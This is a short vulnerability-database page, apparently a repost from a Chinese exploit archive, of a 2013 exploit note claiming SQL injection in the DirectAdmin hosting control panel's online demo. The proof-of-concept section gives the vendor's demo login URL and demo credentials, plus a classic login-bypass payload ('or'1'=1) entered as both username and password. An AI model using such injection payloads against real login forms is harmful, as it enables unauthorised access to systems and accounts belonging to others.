DirectAdmin On-Line Demo SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1045589 漏洞类型
发布时间 2013-02-14 更新时间 2013-02-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013020101
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
++++++++++++++++++++++++++++++++++++++
# Exploit Title :DirectAdmin On-Line Demo SQLInjection
# *Vendor*:http://www.directadmin.com/
# Author: Juan Carlos Garca                                                                                                       # Blog: http://hackingmadrid.blogspot.com
# Facebook https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl


DESCRIPTION
+++++++++++
                                                                                                                                             DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin is compatible with several versions of Red Hat, Fedora Core, Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian.

PoC
++++

https://www.directadmin.com:2222/CMD_LOGIN

user:user_demo
pass:demo

OR

user1:  'or'1'=1
pass1:  'or'1'=1


Procedure:Login using user1/pass1

++++++++++++++++++++++++
Tiger Team Security Nightsec
++++++++++++++++++++++++